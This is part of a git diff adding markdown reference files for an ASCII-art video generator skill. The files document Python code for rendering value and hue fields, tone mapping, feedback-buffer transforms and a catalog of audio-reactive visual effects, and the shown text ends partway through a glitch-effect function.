+This is the workhorse function. It takes a value field + hue field + palette + grid, renders to a complete pixel canvas:
+
+```python
+def _render_vf(r, grid_key, val_fn, hue_fn, pal, f, t, S, sat=0.8, threshold=0.03):
+    """Render a value field + hue field to a pixel canvas via a named grid.
+
+    Args:
+        r: Renderer instance (has .get_grid())
+        grid_key: "xs", "sm", "md", "lg", "xl", "xxl"
+        val_fn: (g, f, t, S) -> float32 [0,1] array (rows, cols)
+        hue_fn: callable (g, f, t, S) -> float32 hue array, OR float scalar
+        pal: character palette string
+        f: feature dict
+        t: time in seconds
+        S: persistent state dict
+        sat: HSV saturation (0-1)
+        threshold: minimum value to render (below = space)
+
+    Returns:
+        uint8 array (VH, VW, 3) — full pixel canvas
+    """
+    g = r.get_grid(grid_key)
+    val = np.clip(val_fn(g, f, t, S), 0, 1)
+    mask = val > threshold
+    ch = val2char(val, mask, pal)
+
+    # Hue: either a callable or a fixed float
+    if callable(hue_fn):
+        h = hue_fn(g, f, t, S) % 1.0
+    else:
+        h = np.full((g.rows, g.cols), float(hue_fn), dtype=np.float32)
+
+    # CRITICAL: broadcast to full shape and copy (see Troubleshooting)
+    h = np.broadcast_to(h, (g.rows, g.cols)).copy()
+
+    R, G, B = hsv2rgb(h, np.full_like(val, sat), val)
+    co = mkc(R, G, B, g.rows, g.cols)
+    return g.render(ch, co)
+```
+
+### Grid Combination Strategies
+
+| Combination | Effect | Good For |
+|-------------|--------|----------|
+| `sm` + `lg` | Maximum contrast between fine detail and chunky blocks | Bold, graphic looks |
+| `sm` + `md` | Subtle texture layering, similar scales | Organic, flowing looks |
+| `md` + `lg` + `xs` | Three-scale interference, maximum complexity | Psychedelic, dense |
+| `sm` + `sm` (different effects) | Same scale, pattern interference only | Moire, interference |
+
+### Complete Multi-Grid Scene Example
+
+```python
+def fx_psychedelic(r, f, t, S):
+    """Three-layer multi-grid scene with beat-reactive kaleidoscope."""
+    # Layer A: plasma on medium grid with rainbow hue
+    canvas_a = _render_vf(r, "md",
+        lambda g, f, t, S: vf_plasma(g, f, t, S) * 1.3,
+        hf_angle(0.0), PAL_DENSE, f, t, S, sat=0.8)
+
+    # Layer B: vortex on small grid with cycling hue
+    canvas_b = _render_vf(r, "sm",
+        lambda g, f, t, S: vf_vortex(g, f, t, S, twist=5.0) * 1.2,
+        hf_time_cycle(0.1), PAL_RUNE, f, t, S, sat=0.7)
+
+    # Layer C: rings on large grid with distance hue
+    canvas_c = _render_vf(r, "lg",
+        lambda g, f, t, S: vf_rings(g, f, t, S, n_base=8, spacing_base=3) * 1.4,
+        hf_distance(0.3, 0.02), PAL_BLOCKS, f, t, S, sat=0.9)
+
+    # Blend: A screened with B, then difference with C
+    result = blend_canvas(canvas_a, canvas_b, "screen", 0.8)
+    result = blend_canvas(result, canvas_c, "difference", 0.6)
+
+    # Beat-triggered kaleidoscope
+    if f.get("bdecay", 0) > 0.3:
+        result = sh_kaleidoscope(result.copy(), folds=6)
+
+    return result
+```
+
+---
+
+## Adaptive Tone Mapping
+
+### The Brightness Problem
+
+ASCII characters are small bright dots on a black background. Most pixels in any frame are background (black). This means:
+- Mean frame brightness is inherently low (often 5-30 out of 255)
+- Different effect combinations produce wildly different brightness levels
+- A spiral scene might be 50 mean, while a fire scene is 9 mean
+- Linear multipliers (e.g., `canvas * 2.0`) either leave dark scenes dark or blow out bright scenes
+
+### The `tonemap()` Function
+
+Replaces linear brightness multipliers with adaptive per-frame normalization + gamma correction:
+
+```python
+def tonemap(canvas, target_mean=90, gamma=0.75, black_point=2, white_point=253):
+    """Adaptive tone-mapping: normalizes + gamma-corrects so no frame is
+    fully dark or washed out.
+
+    1. Compute 1st and 99.5th percentile (ignores outlier pixels)
+    2. Stretch that range to [0, 1]
+    3. Apply gamma curve (< 1 lifts shadows, > 1 darkens)
+    4. Rescale to [black_point, white_point]
+    """
+    f = canvas.astype(np.float32)
+    lo = np.percentile(f, 1)
+    hi = np.percentile(f, 99.5)
+    if hi - lo < 10:
+        hi = max(hi, lo + 10)  # near-uniform frame fallback
+    f = np.clip((f - lo) / (hi - lo), 0.0, 1.0)
+    f = np.power(f, gamma)
+    f = f * (white_point - black_point) + black_point
+    return np.clip(f, 0, 255).astype(np.uint8)
+```
+
+### Why Gamma, Not Linear
+
+Linear multiplier `* 2.0`:
+```
+input 10  -> output 20   (still dark)
+input 100 -> output 200  (ok)
+input 200 -> output 255  (clipped, lost detail)
+```
+
+Gamma 0.75 after normalization:
+```
+input 0.04 -> output 0.08 (lifted from invisible to visible)
+input 0.39 -> output 0.50 (moderate lift)
+input 0.78 -> output 0.84 (gentle lift, no clipping)
+```
+
+Gamma < 1 compresses the highlights and expands the shadows. This is exactly what we need: lift dark ASCII content into visibility without blowing out the bright parts.
+
+### Pipeline Ordering
+
+The pipeline in `render_clip()` is:
+
+```
+scene_fn(r, f, t, S)  ->  canvas
+         |
+    tonemap(canvas, gamma=scene_gamma)
+         |
+    FeedbackBuffer.apply(canvas, ...)
+         |
+    ShaderChain.apply(canvas, f=f, t=t)
+         |
+    ffmpeg pipe
+```
+
+Tonemap runs BEFORE feedback and shaders. This means:
+- Feedback operates on normalized data (consistent behavior regardless of scene brightness)
+- Shaders like solarize, posterize, contrast operate on properly-ranged data
+- The brightness shader in the chain is no longer needed (tonemap handles it)
+
+### Per-Scene Gamma Tuning
+
+Default gamma is 0.75. Scenes that apply destructive post-processing need more aggressive lift because the destruction happens after tonemap:
+
+| Scene Type | Recommended Gamma | Why |
+|------------|-------------------|-----|
+| Standard effects | 0.75 | Default, works for most scenes |
+| Solarize post-process | 0.50-0.60 | Solarize inverts bright pixels, reducing overall brightness |
+| Posterize post-process | 0.50-0.55 | Posterize quantizes, often crushing mid-values to black |
+| Heavy difference blending | 0.60-0.70 | Difference mode creates many near-zero pixels |
+| Already bright scenes | 0.85-1.0 | Don't over-boost scenes that are naturally bright |
+
+Configure via the scene table:
+
+```python
+SCENES = [
+    {"start": 9.17, "end": 11.25, "name": "fire", "gamma": 0.55,
+     "fx": fx_fire, "shaders": [("solarize", {"threshold": 200}), ...]},
+    {"start": 25.96, "end": 27.29, "name": "diamond", "gamma": 0.5,
+     "fx": fx_diamond, "shaders": [("bloom", {"thr": 90}), ...]},
+]
+```
+
+### Brightness Verification
+
+After rendering, spot-check frame brightness:
+
+```python
+# In test-frame mode
+canvas = scene["fx"](r, feat, t, r.S)
+canvas = tonemap(canvas, gamma=scene.get("gamma", 0.75))
+chain = ShaderChain()
+for sn, kw in scene.get("shaders", []):
+    chain.add(sn, **kw)
+canvas = chain.apply(canvas, f=feat, t=t)
+print(f"Mean brightness: {canvas.astype(float).mean():.1f}, max: {canvas.max()}")
+```
+
+Target ranges after tonemap + shaders:
+- Quiet/ambient scenes: mean 30-60
+- Active scenes: mean 40-100
+- Climax/peak scenes: mean 60-150
+- If mean < 20: gamma is too high or a shader is destroying brightness
+- If mean > 180: gamma is too low or add is stacking too much
+
+---
+
+## FeedbackBuffer Spatial Transforms
+
+The feedback buffer stores the previous frame and blends it into the current frame with decay. Spatial transforms applied to the buffer before blending create the illusion of motion in the feedback trail.
+
+### Implementation
+
+```python
+class FeedbackBuffer:
+    def __init__(self):
+        self.buf = None
+
+    def apply(self, canvas, decay=0.85, blend="screen", opacity=0.5,
+              transform=None, transform_amt=0.02, hue_shift=0.0):
+        if self.buf is None:
+            self.buf = canvas.astype(np.float32) / 255.0
+            return canvas
+
+        # Decay old buffer
+        self.buf *= decay
+
+        # Spatial transform
+        if transform:
+            self.buf = self._transform(self.buf, transform, transform_amt)
+
+        # Hue shift the feedback for rainbow trails
+        if hue_shift > 0:
+            self.buf = self._hue_shift(self.buf, hue_shift)
+
+        # Blend feedback into current frame
+        result = blend_canvas(canvas,
+                              np.clip(self.buf * 255, 0, 255).astype(np.uint8),
+                              blend, opacity)
+
+        # Update buffer with current frame
+        self.buf = result.astype(np.float32) / 255.0
+        return result
+
+    def _transform(self, buf, transform, amt):
+        h, w = buf.shape[:2]
+        if transform == "zoom":
+            # Zoom in: sample from slightly inside (creates expanding tunnel)
+            m = int(h * amt); n = int(w * amt)
+            if m > 0 and n > 0:
+                cropped = buf[m:-m or None, n:-n or None]
+                # Resize back to full (nearest-neighbor for speed)
+                buf = np.array(Image.fromarray(
+                    np.clip(cropped * 255, 0, 255).astype(np.uint8)
+                ).resize((w, h), Image.NEAREST)).astype(np.float32) / 255.0
+        elif transform == "shrink":
+            # Zoom out: pad edges, shrink center
+            m = int(h * amt); n = int(w * amt)
+            small = np.array(Image.fromarray(
+                np.clip(buf * 255, 0, 255).astype(np.uint8)
+            ).resize((w - 2*n, h - 2*m), Image.NEAREST))
+            new = np.zeros((h, w, 3), dtype=np.uint8)
+            new[m:m+small.shape[0], n:n+small.shape[1]] = small
+            buf = new.astype(np.float32) / 255.0
+        elif transform == "rotate_cw":
+            # Small clockwise rotation via affine
+            angle = amt * 10  # amt=0.005 -> 0.05 degrees per frame
+            cy, cx = h / 2, w / 2
+            Y = np.arange(h, dtype=np.float32)[:, None]
+            X = np.arange(w, dtype=np.float32)[None, :]
+            cos_a, sin_a = np.cos(angle), np.sin(angle)
+            sx = (X - cx) * cos_a + (Y - cy) * sin_a + cx
+            sy = -(X - cx) * sin_a + (Y - cy) * cos_a + cy
+            sx = np.clip(sx.astype(int), 0, w - 1)
+            sy = np.clip(sy.astype(int), 0, h - 1)
+            buf = buf[sy, sx]
+        elif transform == "rotate_ccw":
+            angle = -amt * 10
+            cy, cx = h / 2, w / 2
+            Y = np.arange(h, dtype=np.float32)[:, None]
+            X = np.arange(w, dtype=np.float32)[None, :]
+            cos_a, sin_a = np.cos(angle), np.sin(angle)
+            sx = (X - cx) * cos_a + (Y - cy) * sin_a + cx
+            sy = -(X - cx) * sin_a + (Y - cy) * cos_a + cy
+            sx = np.clip(sx.astype(int), 0, w - 1)
+            sy = np.clip(sy.astype(int), 0, h - 1)
+            buf = buf[sy, sx]
+        elif transform == "shift_up":
+            pixels = max(1, int(h * amt))
+            buf = np.roll(buf, -pixels, axis=0)
+            buf[-pixels:] = 0  # black fill at bottom
+        elif transform == "shift_down":
+            pixels = max(1, int(h * amt))
+            buf = np.roll(buf, pixels, axis=0)
+            buf[:pixels] = 0
+        elif transform == "mirror_h":
+            buf = buf[:, ::-1]
+        return buf
+
+    def _hue_shift(self, buf, amount):
+        """Rotate hues of the feedback buffer. Operates on float32 [0,1]."""
+        rgb = np.clip(buf * 255, 0, 255).astype(np.uint8)
+        hsv = np.zeros_like(buf)
+        # Simple approximate RGB->HSV->shift->RGB
+        r, g, b = buf[:,:,0], buf[:,:,1], buf[:,:,2]
+        mx = np.maximum(np.maximum(r, g), b)
+        mn = np.minimum(np.minimum(r, g), b)
+        delta = mx - mn + 1e-10
+        # Hue
+        h = np.where(mx == r, ((g - b) / delta) % 6,
+            np.where(mx == g, (b - r) / delta + 2, (r - g) / delta + 4))
+        h = (h / 6 + amount) % 1.0
+        # Reconstruct with shifted hue (simplified)
+        s = delta / (mx + 1e-10)
+        v = mx
+        c = v * s; x = c * (1 - np.abs((h * 6) % 2 - 1)); m = v - c
+        ro = np.zeros_like(h); go = np.zeros_like(h); bo = np.zeros_like(h)
+        for lo, hi, rv, gv, bv in [(0,1,c,x,0),(1,2,x,c,0),(2,3,0,c,x),
+                                     (3,4,0,x,c),(4,5,x,0,c),(5,6,c,0,x)]:
+            mask = ((h*6) >= lo) & ((h*6) < hi)
+            ro[mask] = rv[mask] if not isinstance(rv, (int,float)) else rv
+            go[mask] = gv[mask] if not isinstance(gv, (int,float)) else gv
+            bo[mask] = bv[mask] if not isinstance(bv, (int,float)) else bv
+        return np.stack([ro+m, go+m, bo+m], axis=2)
+```
+
+### Feedback Presets
+
+| Preset | Config | Visual Effect |
+|--------|--------|---------------|
+| Infinite zoom tunnel | `decay=0.8, blend="screen", transform="zoom", transform_amt=0.015` | Expanding ring patterns |
+| Rainbow trails | `decay=0.7, blend="screen", transform="zoom", transform_amt=0.01, hue_shift=0.02` | Psychedelic color trails |
+| Ghostly echo | `decay=0.9, blend="add", opacity=0.15, transform="shift_up", transform_amt=0.01` | Faint upward smearing |
+| Kaleidoscopic recursion | `decay=0.75, blend="screen", transform="rotate_cw", transform_amt=0.005, hue_shift=0.01` | Rotating mandala feedback |
+| Color evolution | `decay=0.8, blend="difference", opacity=0.4, hue_shift=0.03` | Frame-to-frame color XOR |
+| Rising heat haze | `decay=0.5, blend="add", opacity=0.2, transform="shift_up", transform_amt=0.02` | Hot air shimmer |
+
+---
+
+## PixelBlendStack
+
+Higher-level wrapper for multi-layer compositing:
+
+```python
+class PixelBlendStack:
+    def __init__(self):
+        self.layers = []
+
+    def add(self, canvas, mode="normal", opacity=1.0):
+        self.layers.append((canvas, mode, opacity))
+        return self
+
+    def composite(self):
+        if not self.layers:
+            return np.zeros((VH, VW, 3), dtype=np.uint8)
+        result = self.layers[0][0]
+        for canvas, mode, opacity in self.layers[1:]:
+            result = blend_canvas(result, canvas, mode, opacity)
+        return result
+```
diff --git a/skills/creative/ascii-video/references/effects.md b/skills/creative/ascii-video/references/effects.md
new file mode 100644
index 00000000..ee0ff2c2
--- /dev/null
+++ b/skills/creative/ascii-video/references/effects.md
@@ -0,0 +1,893 @@
+# Effect Catalog
+
+Effect building blocks that produce visual patterns. In v2, these are used **inside scene functions** that return a pixel canvas directly. The building blocks below operate on grid coordinate arrays and produce `(chars, colors)` or value/hue fields that the scene function renders to canvas via `_render_vf()`. See `composition.md` for the v2 rendering pattern and `scenes.md` for scene function examples.
+
+## Design Philosophy
+
+Effects are the creative core. Don't copy these verbatim for every project -- use them as **building blocks** and **combine, modify, and invent** new ones. Every project should feel distinct.
+
+Key principles:
+- **Layer multiple effects** rather than using a single monolithic function
+- **Parameterize everything** -- hue, speed, density, amplitude should all be arguments
+- **React to features** -- audio/video features should modulate at least 2-3 parameters per effect
+- **Vary per section** -- never use the same effect config for the entire video
+- **Invent project-specific effects** -- the catalog below is a starting vocabulary, not a fixed set
+
+---
+
+## Background Fills
+
+Every effect should start with a background. Never leave flat black.
+
+### Animated Sine Field (General Purpose)
+```python
+def bg_sinefield(g, f, t, hue=0.6, bri=0.5, pal=PAL_DEFAULT,
+                 freq=(0.13, 0.17, 0.07, 0.09), speed=(0.5, -0.4, -0.3, 0.2)):
+    """Layered sine field. Adjust freq/speed tuples for different textures."""
+    v1 = np.sin(g.cc*freq[0] + t*speed[0]) * np.sin(g.rr*freq[1] - t*speed[1]) * 0.5 + 0.5
+    v2 = np.sin(g.cc*freq[2] - t*speed[2] + g.rr*freq[3]) * 0.4 + 0.5
+    v3 = np.sin(g.dist_n*5 + t*0.2) * 0.3 + 0.4
+    v4 = np.cos(g.angle*3 - t*0.6) * 0.15 + 0.5
+    val = np.clip((v1*0.3 + v2*0.25 + v3*0.25 + v4*0.2) * bri * (0.6 + f["rms"]*0.6), 0.06, 1)
+    mask = val > 0.03
+    ch = val2char(val, mask, pal)
+    h = np.full_like(val, hue) + f.get("cent", 0.5)*0.1 + val*0.08
+    R, G, B = hsv2rgb(h, np.clip(0.35+f.get("flat",0.4)*0.4, 0, 1) * np.ones_like(val), val)
+    return ch, mkc(R, G, B, g.rows, g.cols)
+```
+
+### Video-Source Background
+```python
+def bg_video(g, frame_rgb, pal=PAL_DEFAULT, brightness=0.5):
+    small = np.array(Image.fromarray(frame_rgb).resize((g.cols, g.rows)))
+    lum = np.mean(small, axis=2) / 255.0 * brightness
+    mask = lum > 0.02
+    ch = val2char(lum, mask, pal)
+    co = np.clip(small * np.clip(lum[:,:,None]*1.5+0.3, 0.3, 1), 0, 255).astype(np.uint8)
+    return ch, co
+```
+
+### Noise / Static Field
+```python
+def bg_noise(g, f, t, pal=PAL_BLOCKS, density=0.3, hue_drift=0.02):
+    val = np.random.random((g.rows, g.cols)).astype(np.float32) * density * (0.5 + f["rms"]*0.5)
+    val = np.clip(val, 0, 1); mask = val > 0.02
+    ch = val2char(val, mask, pal)
+    R, G, B = hsv2rgb(np.full_like(val, t*hue_drift % 1), np.full_like(val, 0.3), val)
+    return ch, mkc(R, G, B, g.rows, g.cols)
+```
+
+### Perlin-Like Smooth Noise
+```python
+def bg_smooth_noise(g, f, t, hue=0.5, bri=0.5, pal=PAL_DOTS, octaves=3):
+    """Layered sine approximation of Perlin noise. Cheap, smooth, organic."""
+    val = np.zeros((g.rows, g.cols), dtype=np.float32)
+    for i in range(octaves):
+        freq = 0.05 * (2 ** i)
+        amp = 0.5 / (i + 1)
+        phase = t * (0.3 + i * 0.2)
+        val += np.sin(g.cc * freq + phase) * np.cos(g.rr * freq * 0.7 - phase * 0.5) * amp
+    val = np.clip(val * 0.5 + 0.5, 0, 1) * bri
+    mask = val > 0.03
+    ch = val2char(val, mask, pal)
+    h = np.full_like(val, hue) + val * 0.1
+    R, G, B = hsv2rgb(h, np.full_like(val, 0.5), val)
+    return ch, mkc(R, G, B, g.rows, g.cols)
+```
+
+### Cellular / Voronoi Approximation
+```python
+def bg_cellular(g, f, t, n_centers=12, hue=0.5, bri=0.6, pal=PAL_BLOCKS):
+    """Voronoi-like cells using distance to nearest of N moving centers."""
+    rng = np.random.RandomState(42)  # deterministic centers
+    cx = (rng.rand(n_centers) * g.cols).astype(np.float32)
+    cy = (rng.rand(n_centers) * g.rows).astype(np.float32)
+    # Animate centers
+    cx_t = cx + np.sin(t * 0.5 + np.arange(n_centers) * 0.7) * 5
+    cy_t = cy + np.cos(t * 0.4 + np.arange(n_centers) * 0.9) * 3
+    # Min distance to any center
+    min_d = np.full((g.rows, g.cols), 999.0, dtype=np.float32)
+    for i in range(n_centers):
+        d = np.sqrt((g.cc - cx_t[i])**2 + (g.rr - cy_t[i])**2)
+        min_d = np.minimum(min_d, d)
+    val = np.clip(1.0 - min_d / (g.cols * 0.3), 0, 1) * bri
+    # Cell edges (where distance is near-equal between two centers)
+    # ... second-nearest trick for edge highlighting
+    mask = val > 0.03
+    ch = val2char(val, mask, pal)
+    R, G, B = hsv2rgb(np.full_like(val, hue) + min_d * 0.005, np.full_like(val, 0.5), val)
+    return ch, mkc(R, G, B, g.rows, g.cols)
+```
+
+---
+
+## Radial Effects
+
+### Concentric Rings
+Bass/sub-driven pulsing rings from center. Scale ring count and thickness with bass energy.
+```python
+def eff_rings(g, f, t, hue=0.5, n_base=6, pal=PAL_DEFAULT):
+    n_rings = int(n_base + f["sub_r"] * 25 + f["bass"] * 10)
+    spacing = 2 + f["bass_r"] * 7 + f["rms"] * 3
+    ring_cv = np.zeros((g.rows, g.cols), dtype=np.float32)
+    for ri in range(n_rings):
+        rad = (ri+1) * spacing + f["bdecay"] * 15
+        wobble = f["mid_r"]*5*np.sin(g.angle*3 + t*4) + f["hi_r"]*3*np.sin(g.angle*7 - t*6)
+        rd = np.abs(g.dist - rad - wobble)
+        th = 1 + f["sub"] * 3
+        ring_cv = np.maximum(ring_cv, np.clip((1 - rd/th) * (0.4 + f["bass"]*0.8), 0, 1))
+    # Color by angle + distance for rainbow rings
+    h = g.angle/(2*np.pi) + g.dist*0.005 + f["sub_r"]*0.2
+    return ring_cv, h
+```
+
+### Radial Rays
+```python
+def eff_rays(g, f, t, n_base=8, hue=0.5):
+    n_rays = int(n_base + f["hi_r"] * 25)
+    ray = np.clip(np.cos(g.angle*n_rays + t*3) * f["bdecay"]*0.6 * (1-g.dist_n), 0, 0.7)
+    return ray
+```
+
+### Spiral Arms (Logarithmic)
+```python
+def eff_spiral(g, f, t, n_arms=3, tightness=2.5, hue=0.5):
+    arm_cv = np.zeros((g.rows, g.cols), dtype=np.float32)
+    for ai in range(n_arms):
+        offset = ai * 2*np.pi / n_arms
+        log_r = np.log(g.dist + 1) * tightness
+        arm_phase = g.angle + offset - log_r + t * 0.8
+        arm_val = np.clip(np.cos(arm_phase * n_arms) * 0.6 + 0.2, 0, 1)
+        arm_val *= (0.4 + f["rms"]*0.6) * np.clip(1 - g.dist_n*0.5, 0.2, 1)
+        arm_cv = np.maximum(arm_cv, arm_val)
+    return arm_cv
+```
+
+### Center Glow / Pulse
+```python
+def eff_glow(g, f, t, intensity=0.6, spread=2.0):
+    return np.clip(intensity * np.exp(-g.dist_n * spread) * (0.5 + f["rms"]*2 + np.sin(t*1.2)*0.2), 0, 0.9)
+```
+
+### Tunnel / Depth
+```python
+def eff_tunnel(g, f, t, speed=3.0, complexity=6):
+    tunnel_d = 1.0 / (g.dist_n + 0.1)
+    v1 = np.sin(tunnel_d*2 - t*speed) * 0.45 + 0.55
+    v2 = np.sin(g.angle*complexity + tunnel_d*1.5 - t*2) * 0.35 + 0.55
+    return v1 * 0.5 + v2 * 0.5
+```
+
+### Vortex (Rotating Distortion)
+```python
+def eff_vortex(g, f, t, twist=3.0, pulse=True):
+    """Twisting radial pattern -- distance modulates angle."""
+    twisted = g.angle + g.dist_n * twist * np.sin(t * 0.5)
+    val = np.sin(twisted * 4 - t * 2) * 0.5 + 0.5
+    if pulse:
+        val *= 0.5 + f.get("bass", 0.3) * 0.8
+    return np.clip(val, 0, 1)
+```
+
+---
+
+## Wave Effects
+
+### Multi-Band Frequency Waves
+Each frequency band draws its own wave at different spatial/temporal frequencies:
+```python
+def eff_freq_waves(g, f, t, bands=None):
+    if bands is None:
+        bands = [("sub",0.06,1.2,0.0), ("bass",0.10,2.0,0.08), ("lomid",0.15,3.0,0.16),
+                 ("mid",0.22,4.5,0.25), ("himid",0.32,6.5,0.4), ("hi",0.45,8.5,0.55)]
+    mid = g.rows / 2.0
+    composite = np.zeros((g.rows, g.cols), dtype=np.float32)
+    for band_key, sf, tf, hue_base in bands:
+        amp = f.get(band_key, 0.3) * g.rows * 0.4
+        y_wave = mid - np.sin(g.cc*sf + t*tf) * amp
+        y_wave += np.sin(g.cc*sf*2.3 + t*tf*1.7) * amp * 0.2  # harmonic
+        dist = np.abs(g.rr - y_wave)
+        thickness = 2 + f.get(band_key, 0.3) * 5
+        intensity = np.clip((1 - dist/thickness) * f.get(band_key, 0.3) * 1.5, 0, 1)
+        composite = np.maximum(composite, intensity)
+    return composite
+```
+
+### Interference Pattern
+6-8 overlapping sine waves creating moire-like patterns:
+```python
+def eff_interference(g, f, t, n_waves=5):
+    """Parametric interference -- vary n_waves for complexity."""
+    # Each wave has different orientation, frequency, and feature driver
+    drivers = ["mid_r", "himid_r", "bass_r", "lomid_r", "hi_r"]
+    vals = np.zeros((g.rows, g.cols), dtype=np.float32)
+    for i in range(min(n_waves, len(drivers))):
+        angle = i * np.pi / n_waves  # spread orientations
+        freq = 0.06 + i * 0.03
+        sp = 0.5 + i * 0.3
+        proj = g.cc * np.cos(angle) + g.rr * np.sin(angle)
+        vals += np.sin(proj * freq + t * sp) * f.get(drivers[i], 0.3) * 2.5
+    return np.clip(vals * 0.12 + 0.45, 0.1, 1)
+```
+
+### Aurora / Horizontal Bands
+```python
+def eff_aurora(g, f, t, hue=0.4, n_bands=3):
+    val = np.zeros((g.rows, g.cols), dtype=np.float32)
+    for i in range(n_bands):
+        freq_r = 0.08 + i * 0.04
+        freq_c = 0.012 + i * 0.008
+        sp_r = 0.7 + i * 0.3
+        sp_c = 0.18 + i * 0.12
+        val += np.sin(g.rr*freq_r + t*sp_r) * np.sin(g.cc*freq_c + t*sp_c) * (0.6 / n_bands)
+    return np.clip(val * (f.get("lomid_r", 0.3)*3 + 0.2), 0, 0.7)
+```
+
+### Ripple (Point-Source Waves)
+```python
+def eff_ripple(g, f, t, sources=None, freq=0.3, damping=0.02):
+    """Concentric ripples from point sources. Sources = [(row_frac, col_frac), ...]"""
+    if sources is None:
+        sources = [(0.5, 0.5)]  # center
+    val = np.zeros((g.rows, g.cols), dtype=np.float32)
+    for ry, rx in sources:
+        dy = g.rr - g.rows * ry
+        dx = g.cc - g.cols * rx
+        d = np.sqrt(dy**2 + dx**2)
+        val += np.sin(d * freq - t * 4) * np.exp(-d * damping) * 0.5
+    return np.clip(val + 0.5, 0, 1)
+```
+
+---
+
+## Particle Systems
+
+### General Pattern
+All particle systems use persistent state:
+```python
+S = state  # dict persisted across frames
+if "px" not in S:
+    S["px"]=[]; S["py"]=[]; S["vx"]=[]; S["vy"]=[]; S["life"]=[]; S["char"]=[]
+
+# Emit new particles (on beat, continuously, or on trigger)
+# Update: position += velocity, apply forces, decay life
+# Draw: map to grid, set char/color based on life
+# Cull: remove dead, cap total count
+```
+
+### Particle Character Sets
+
+Don't hardcode particle chars. Choose per project/mood:
+
+```python
+# Energy / explosive
+PART_ENERGY  = list("*+#@\u26a1\u2726\u2605\u2588\u2593")
+PART_SPARK   = list("\u00b7\u2022\u25cf\u2605\u2736*+")
+# Organic / natural
+PART_LEAF    = list("\u2740\u2741\u2742\u2743\u273f\u2618\u2022")
+PART_SNOW    = list("\u2744\u2745\u2746\u00b7\u2022*\u25cb")
+PART_RAIN    = list("|\u2502\u2503\u2551/\\")
+PART_BUBBLE  = list("\u25cb\u25ce\u25c9\u25cf\u2218\u2219\u00b0")
+# Data / tech
+PART_DATA    = list("01{}[]<>|/\\")
+PART_HEX     = list("0123456789ABCDEF")
+PART_BINARY  = list("01")
+# Mystical
+PART_RUNE    = list("\u16a0\u16a2\u16a6\u16b1\u16b7\u16c1\u16c7\u16d2\u16d6\u16da\u16de\u16df\u2726\u2605")
+PART_ZODIAC  = list("\u2648\u2649\u264a\u264b\u264c\u264d\u264e\u264f\u2650\u2651\u2652\u2653")
+# Minimal
+PART_DOT     = list("\u00b7\u2022\u25cf")
+PART_DASH    = list("-=~\u2500\u2550")
+```
+
+### Explosion (Beat-Triggered)
+```python
+def emit_explosion(S, f, center_r, center_c, char_set=PART_ENERGY, count_base=80):
+    if f.get("beat", 0) > 0:
+        for _ in range(int(count_base + f["rms"]*150)):
+            ang = random.uniform(0, 2*math.pi)
+            sp = random.uniform(1, 9) * (0.5 + f.get("sub_r", 0.3)*2)
+            S["px"].append(float(center_c))
+            S["py"].append(float(center_r))
+            S["vx"].append(math.cos(ang)*sp*2.5)
+            S["vy"].append(math.sin(ang)*sp)
+            S["life"].append(1.0)
+            S["char"].append(random.choice(char_set))
+# Update: gravity on vy += 0.03, life -= 0.015
+# Color: life * 255 for brightness, hue fade controlled by caller
+```
+
+### Rising Embers
+```python
+# Emit: sy = rows-1, vy = -random.uniform(1,5), vx = random.uniform(-1.5,1.5)
+# Update: vx += random jitter * 0.3, life -= 0.01
+# Cap at ~1500 particles
+```
+
+### Dissolving Cloud
+```python
+# Init: N=600 particles spread across screen
+# Update: slow upward drift, fade life progressively
+# life -= 0.002 * (1 + elapsed * 0.05)  # accelerating fade
+```
+
+### Starfield (3D Projection)
+```python
+# N stars with (sx, sy, sz) in normalized coords
+# Move: sz -= speed (stars approach camera)
+# Project: px = cx + sx/sz * cx, py = cy + sy/sz * cy
+# Reset stars that pass camera (sz <= 0.01)
+# Brightness = (1 - sz), draw streaks behind bright stars
+```
+
+### Orbit (Circular/Elliptical Motion)
+```python
+def emit_orbit(S, n=20, radius=15, speed=1.0, char_set=PART_DOT):
+    """Particles orbiting a center point."""
+    for i in range(n):
+        angle = i * 2 * math.pi / n
+        S["px"].append(0.0); S["py"].append(0.0)  # will be computed from angle
+        S["vx"].append(angle)  # store angle as "vx" for orbit
+        S["vy"].append(radius + random.uniform(-2, 2))  # store radius
+        S["life"].append(1.0)
+        S["char"].append(random.choice(char_set))
+# Update: angle += speed * dt, px = cx + radius * cos(angle), py = cy + radius * sin(angle)
+```
+
+### Gravity Well
+```python
+# Particles attracted toward one or more gravity points
+# Update: compute force vector toward each well, apply as acceleration
+# Particles that reach well center respawn at edges
+```
+
+---
+
+## Rain / Matrix Effects
+
+### Column Rain (Vectorized)
+```python
+def eff_matrix_rain(g, f, t, state, hue=0.33, bri=0.6, pal=PAL_KATA,
+                    speed_base=0.5, speed_beat=3.0):
+    """Vectorized matrix rain. state dict persists column positions."""
+    if "ry" not in state or len(state["ry"]) != g.cols:
+        state["ry"] = np.random.uniform(-g.rows, g.rows, g.cols).astype(np.float32)
+        state["rsp"] = np.random.uniform(0.3, 2.0, g.cols).astype(np.float32)
+        state["rln"] = np.random.randint(8, 40, g.cols)
+        state["rch"] = np.random.randint(0, len(pal), (g.rows, g.cols))  # pre-assign chars
+
+    speed_mult = speed_base + f.get("bass", 0.3)*speed_beat + f.get("sub_r", 0.3)*3
+    if f.get("beat", 0) > 0: speed_mult *= 2.5
+    state["ry"] += state["rsp"] * speed_mult
+
+    # Reset columns that fall past bottom
+    rst = (state["ry"] - state["rln"]) > g.rows
+    state["ry"][rst] = np.random.uniform(-25, -2, rst.sum())
+
+    # Vectorized draw using fancy indexing
+    ch = np.full((g.rows, g.cols), " ", dtype="U1")
+    co = np.zeros((g.rows, g.cols, 3), dtype=np.uint8)
+    heads = state["ry"].astype(int)
+    for c in range(g.cols):
+        head = heads[c]
+        trail_len = state["rln"][c]
+        for i in range(trail_len):
+            row = head - i
+            if 0 <= row < g.rows:
+                fade = 1.0 - i / trail_len
+                ci = state["rch"][row, c] % len(pal)
+                ch[row, c] = pal[ci]
+                v = fade * bri * 255
+                if i == 0:  # head is bright white-ish
+                    co[row, c] = (int(v*0.9), int(min(255, v*1.1)), int(v*0.9))
+                else:
+                    R, G, B = hsv2rgb_single(hue, 0.7, fade * bri)
+                    co[row, c] = (R, G, B)
+    return ch, co, state
+```
+
+---
+
+## Glitch / Data Effects
+
+### Horizontal Band Displacement
+```python
+def eff_glitch_displace(ch, co, f, intensity=1.0):
+    n_bands = int(8 + f.get("flux", 0.3)*25 + f.get("bdecay", 0)*15) * intensity
+    for _ in range(int(n_bands)):
+        y = random.randint(0, ch.shape[0]-1)
+        h = random.randint(1, int(3 + f.get("sub", 0.3)*8))
